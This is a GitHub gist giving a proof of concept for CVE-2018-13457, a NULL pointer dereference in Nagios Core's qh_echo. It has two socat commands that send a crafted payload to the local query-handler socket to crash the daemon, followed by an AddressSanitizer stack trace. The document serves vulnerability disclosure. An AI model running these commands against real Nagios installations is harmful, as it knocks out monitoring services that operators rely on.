Skip to content

Instantly share code, notes, and snippets.

@fakhrizulkifli
Last active July 11, 2018 15:22
Show Gist options
  • Save fakhrizulkifli/87cf1c1ad403b4d40a86d90c9c9bf7ab to your computer and use it in GitHub Desktop.
Save fakhrizulkifli/87cf1c1ad403b4d40a86d90c9c9bf7ab to your computer and use it in GitHub Desktop.
CVE-2018-13457
# Exploit Title: Nagios Core qh_echo Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
# CVE : CVE-2018-13457
qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -
#0 0x4cb18b in __interceptor_strcmp.part.60 /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:422
#1 0x554e98 in qh_echo /home/user/nagioscore/base/query-handler.c:29:7
#2 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12
#3 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4
#4 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12
#5 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4
#6 0x7f183c5f782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#7 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment